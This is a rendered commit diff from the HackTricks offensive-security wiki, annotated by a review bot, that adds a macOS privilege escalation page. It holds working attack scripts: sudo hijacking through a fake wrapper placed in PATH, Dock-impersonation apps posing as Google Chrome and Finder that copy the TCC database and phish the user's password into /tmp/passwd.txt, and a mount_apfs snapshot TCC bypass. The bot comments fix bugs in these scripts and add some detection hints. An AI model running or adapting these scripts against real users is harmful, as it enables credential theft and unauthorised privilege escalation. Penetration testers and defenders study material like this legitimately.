mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GITBOOK-4199: change request with no subject merged in GitBook
parent
f97bf8980c
commit
d9768bdb93
5 changed files with 308 additions and 48 deletions
@ -162,6 +162,7 @@
* [macOS Sensitive Locations](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md)
* [macOS Universal binaries & Mach-O Format](macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md)
* [macOS Objective-C](macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md)
* [macOS Privilege Escalation](macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md)
* [macOS Proces Abuse](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md)
* [macOS Dirty NIB](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md)
* [macOS Electron Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
@ -7,7 +7,7 @@
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
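Review bot: the only change in this hunk is the escaped underscore in the Twitter link on the "Join the" bullet (`hacktricks_live` becomes `hacktricks\_live`); CommonMark resolves `\_` to `_` inside a link destination, so the link still works, but the escape is unnecessary noise and the unescaped form already appears elsewhere in this commit, so one spelling should be used. The identical edit is repeated in the second banner hunk below and carries the same remark.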
@ -93,7 +93,7 @@ You can check if the sudo version is vulnerable using this grep.
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
```
### sudo < v1.28
#### sudo < v1.28
From @sickrov
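Review bot: the heading changed here is only demoted from `###` to `####`, but its text is still wrong: there is no sudo 1.28, and the grep on the context line above (`1\.8\.2[01234567]`) stops at 1.8.27, so the heading should read `sudo < v1.8.28`. While touching that grep, note that `\*` in `1\.8\.1[0-9]\*` is a literal asterisk in a basic regular expression, so versions 1.8.10 through 1.8.19 are never matched; `1\.8\.1[0-9]` without the trailing `\*` is what was meant.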
@ -1152,6 +1152,23 @@ If you know that a **user usually connects to a machine and uses `sudo`** to esc
Note that if the user uses a different shell (not bash) you will need to modify other files to add the new path. For example[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifies `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. You can find another example in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire\_modules/bashdoor.py)
Or running something like:
```bash
cat >/tmp/sudo <<EOF
#!/bin/bash
/usr/bin/sudo whoami > /tmp/privesc
/usr/bin/sudo "\$@"
EOF
chmod +x /tmp/sudo
echo ‘export PATH=/tmp:$PATH’ >> $HOME/.zshenv # or ".bashrc" or any other
# From the victim
zsh
echo $PATH
sudo ls
```
## Shared Library
### ld.so
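Review bot: the line `echo ‘export PATH=/tmp:$PATH’ >> $HOME/.zshenv` uses typographic quotes (‘ ’), which the shell does not treat as quoting; `$PATH` is therefore expanded when the line is written and the curly quotes land literally in `.zshenv`, which zsh then fails to parse. Use plain single quotes: `echo 'export PATH=/tmp:$PATH' >> $HOME/.zshenv`. The heredoc itself is right: it is unquoted, so the `\$@` escape is needed to keep `"$@"` literal in `/tmp/sudo`. In the prose line the link has a misplaced space (`For example[ sudo-piggyback]` should be `For example [sudo-piggyback]`). On the defensive side this hunk names exactly the files worth baselining and diffing (`~/.zshenv`, `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`): a user-writable directory prepended to `PATH` in any of them is the artefact an investigator looks for.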
@ -1254,7 +1271,6 @@ screen -ls <username>/ # Show another user' screen sessions
![](<../../.gitbook/assets/image (130).png>)
**Attach to a session**
```bash
@ -1649,7 +1665,7 @@ Files that ship in packages downloaded from the distribution repository go into
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
@ -104,13 +104,7 @@ For this kind of vulnerabilities don't forget to **check vulnerable `.pkg` insta
[macos-installers-abuse.md](macos-files-folders-and-binaries/macos-installers-abuse.md)
{% endcontent-ref %}
### Entitlements and Privileges abuse via process abuse
If a process can **inject code in another process with better privileges or entitlements** or contact it to perform privileges actions, he could escalate privileges and bypass defensive meassures such as [Sandbox](macos-security-protections/macos-sandbox/) or [TCC](macos-security-protections/macos-tcc/).
{% content-ref url="macos-proces-abuse/" %}
[macos-proces-abuse](macos-proces-abuse/)
{% endcontent-ref %}
### File Extension & URL scheme app handlers
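Review bot: this hunk drops the `### Entitlements and Privileges abuse via process abuse` subsection together with its `{% content-ref url="macos-proces-abuse/" %}` block, and nothing in the new `macos-privilege-escalation.md` added later in this commit re-introduces it, so the process-abuse page loses its inbound link from this README and stays reachable only through SUMMARY.md. If the intent was to move rather than delete, re-add the reference in the new page (fixing `meassures` to `measures` and `he could` to `it could` on the way).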
@ -120,49 +114,22 @@ Weird apps registered by file extensions could be abused and different applicati
[macos-file-extension-apps.md](macos-file-extension-apps.md)
{% endcontent-ref %}
## MacOS Privilege Escalation
## macOS TCC / SIP Privilege Escalation
### CVE-2020-9771 - mount\_apfs TCC bypass and privilege escalation
In macOS **applications and binaries can have permissions** to access folders or settings that make them more privileged than others.
**Any user** (even unprivileged ones) can create and mount a time machine snapshot an **access ALL the files** of that snapshot.\
The **only privileged** needed is for the application used (like `Terminal`) to have **Full Disk Access** (FDA) access (`kTCCServiceSystemPolicyAllfiles`) which need to be granted by an admin.
Therefore, an attacker that wants to successfully compromise a macOS machine will need to **escalate its TCC privileges** (or even **bypass SIP**, depending on his needs).
{% code overflow="wrap" %}
```bash
# Create snapshot
tmutil localsnapshot
These privileges are usually given in the form of **entitlements** the application is signed with, or the application might requested some accesses and after the **user approving them** they can be found in the **TCC databases**. Another way a process can obtain these privileges is by being a **child of a process** with those **privileges** as they are usually **inherited**.
# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local
Follow these links to find different was to [**escalate privileges in TCC**](macos-security-protections/macos-tcc/#tcc-privesc-and-bypasses), to [**bypass TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) and how in the past [**SIP has been bypassed**](macos-security-protections/macos-sip.md#sip-bypasses).
# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap
## macOS Traditional Privilege Escalation
# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
Of course from a red teams perspective you should be also interested in escalating to root. Check the following post for some hints:
# Access it
ls /tmp/snap/Users/admin_user # This will work
```
{% endcode %}
A more detailed explanation can be [**found in the original report**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.**
### Sensitive Information
{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)
{% endcontent-ref %}
### Linux Privesc
First of all, please note that **most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS** machines. So see:
{% content-ref url="../../linux-hardening/privilege-escalation/" %}
[privilege-escalation](../../linux-hardening/privilege-escalation/)
{% content-ref url="macos-privilege-escalation.md" %}
[macos-privilege-escalation.md](macos-privilege-escalation.md)
{% endcontent-ref %}
## References
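Review bot: the rendered diff has lost its +/- markers, so the `tmutil` / `mount_apfs` snippet shown interleaved here is the old text being moved out (it reappears verbatim in the new file under `## TCC - Root Privilege Escalation`), and the new prose that replaces it needs copy-editing before merge: `different was to` should read `different ways to`, `the application might requested some accesses` should read `might have requested some access`, and `from a red teams perspective` needs the possessive `red team's`. The sentence `Therefore, an attacker ... will need to escalate its TCC privileges (or even bypass SIP, depending on his needs)` also switches from `its` to `his` for the same subject.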
@ -0,0 +1,270 @@
# macOS Privilege Escalation
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## TCC Privilege Escalation
If you came here looking for TCC privilege escalation go to:
{% content-ref url="macos-security-protections/macos-tcc/" %}
[macos-tcc](macos-security-protections/macos-tcc/)
{% endcontent-ref %}
## Linux Privesc
Please note that **most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS** machines. So see:
{% content-ref url="../../linux-hardening/privilege-escalation/" %}
[privilege-escalation](../../linux-hardening/privilege-escalation/)
{% endcontent-ref %}
## User Interaction
### Sudo Hijacking
You can find the original [Sudo Hijacking technique inside the Linux Privilege Escalation post](../../linux-hardening/privilege-escalation/#sudo-hijacking).
However, macOS **maintains** the user's **`PATH`** when he executes **`sudo`**. Which means that another way to achieve this attack would be to **hijack other binaries** that the victim sill execute when **running sudo:**
```bash
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
cat > /opt/homebrew/bin/ls <<EOF
#!/bin/bash
if [ "\$(id -u)" -eq 0 ]; then
whoami > /tmp/privesc
fi
/bin/ls "\$@"
EOF
chmod +x /opt/homebrew/bin/ls
# victim
sudo ls
```
Note that a user that uses the terminal will highly probable have **Homebrew installed**. So it's possible to hijack binaries in **`/opt/homebrew/bin`**.
### Dock Impersonation
Using some **social engineering** you could **impersonate for example Google Chrome** inside the dock and actually execute your own script:
{% tabs %}
{% tab title="Chrome Impersonation" %}
Some suggestions:
* Check in the Dock if there is a Chrome, and in that case **remove** that entry and **add** the **fake** **Chrome entry in the same position** in the Dock array. 
```bash
#!/bin/sh
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
# Payload to execute
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF
gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF
# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock
```
{% endtab %}
{% tab title="Finder Impersonation" %}
Some suggestions:
* You **cannot remove Finder from the Dock**, so if you are going to add it to the Dock, you could put the fake Finder just next to the real one. For this you need to **add the fake Finder entry at the beginning of the Dock array**.
* Another option is to not place it in the Dock and just open it, "Finder asking to control Finder" is not that weird.
```bash
#!/bin/sh
# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';
rm -rf /tmp/Finder.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Finder.app/Contents/MacOS
mkdir -p /tmp/Finder.app/Contents/Resources
# Payload to execute
cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char *cmd = "open /System/Library/CoreServices/Finder.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF
gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c
chmod +x /tmp/Finder.app/Contents/MacOS/Finder
# Info.plist
cat << EOF > /tmp/Finder.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Finder</string>
<key>CFBundleIdentifier</key>
<string>com.apple.finder</string>
<key>CFBundleName</key>
<string>Finder</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF
# Copy icon from Finder
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock
```
{% endtab %}
{% endtabs %}
## TCC - Root Privilege Escalation
### CVE-2020-9771 - mount\_apfs TCC bypass and privilege escalation
**Any user** (even unprivileged ones) can create and mount a time machine snapshot an **access ALL the files** of that snapshot.\
The **only privileged** needed is for the application used (like `Terminal`) to have **Full Disk Access** (FDA) access (`kTCCServiceSystemPolicyAllfiles`) which need to be granted by an admin.
{% code overflow="wrap" %}
```bash
# Create snapshot
tmutil localsnapshot
# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local
# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap
# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
# Access it
ls /tmp/snap/Users/admin_user # This will work
```
{% endcode %}
A more detailed explanation can be [**found in the original report**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.**
## Sensitive Information
This can be useful to escalate privileges:
{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)
{% endcontent-ref %}
###
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
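Review bot: several wording errors in the new file should be fixed before merge: `the victim sill execute` (will), `will highly probable have` (will most likely have), `mount a time machine snapshot an access ALL the files` (and access), `The only privileged needed` (privilege), `cd /tmp # I didn it from this folder` (did), and the empty `###` heading after the Sensitive Information block should be deleted. In the Sudo Hijacking snippet, `/opt/homebrew/bin` is Homebrew's prefix only on Apple Silicon; Intel Macs use `/usr/local/bin`, so the comment `as this is usually already in the users PATH` should say which one. The reason the trick works at all is that the macOS sudoers file sets no `secure_path`, which is also the mitigation worth stating next to `macOS maintains the user's PATH when he executes sudo`. In the Dock tabs, the prose says `execute your own script` but the payload is C compiled on the target with `gcc`, which needs the Xcode command line tools; the comment `# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)` is a copy-paste leftover from the Chrome tab; and the `osascript -e 'tell application "Finder"' ... duplicate file sourceFile` step raises the Automation consent prompt the Finder tab alludes to (`"Finder asking to control Finder" is not that weird`), which the Chrome tab should mention as well. From a detection angle, both scripts leave a `persistent-apps` entry whose `_CFURLString` points under `/tmp`, so `defaults read com.apple.dock persistent-apps` is where an investigator spots this.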
@ -118,7 +118,7 @@ Checking both databases you can check the permissions an app has allowed, has fo
* The **`auth_reason`** can take the following values: Error(1), User Consent(2), User Set(3), System Set(4), Service Policy(5), MDM Policy(6), Override Policy(7), Missing usage string(8), Prompt Timeout(9), Preflight Unknown(10), Entitled(11), App Type Policy(12)
* The **csreq** field is there to indicate how to verify the binary to execute and grant the TCC permissions:
```
```bash
# Query to get cserq in printable hex
select service, client, hex(csreq) from access where auth_value=2;
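Review bot: replacing the bare ``` with ```bash fixes the opening fence of this block, which previously started an unlabeled code block one line early; the comment on the next line still misspells the column name (`cserq` in `# Query to get cserq in printable hex`, while the query uses `hex(csreq)`), worth correcting in the same pass.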
@ -251,7 +251,11 @@ The extended attribute `com.apple.macl` **can’t be cleared** like other extend
If at some point you manage to get write access over a TCC database you can use something like the following to add an entry (remove the comments):
```
<details>
<summary>Insert into TCC example</summary>
```sql
INSERT INTO access (
service,
client,
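Review bot: the stray ``` that used to open the SQL block is replaced by a `<details><summary>Insert into TCC example</summary>` wrapper; the blank line between `</summary>` and the ```sql fence is what lets the fence be parsed inside raw HTML, so keep it. The matching `</details>` only arrives in the next hunk, so this hunk on its own leaves the element unclosed.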
@ -291,6 +295,8 @@ INSERT INTO access (
);
```
</details>
### Privesc from Automation to FDA
**Finder** is an application that **always has FDA** (even if it doesn't appear in the UI), so if you have **Automation** privileges over it, you can abuse its privileges to **make it do some actions**.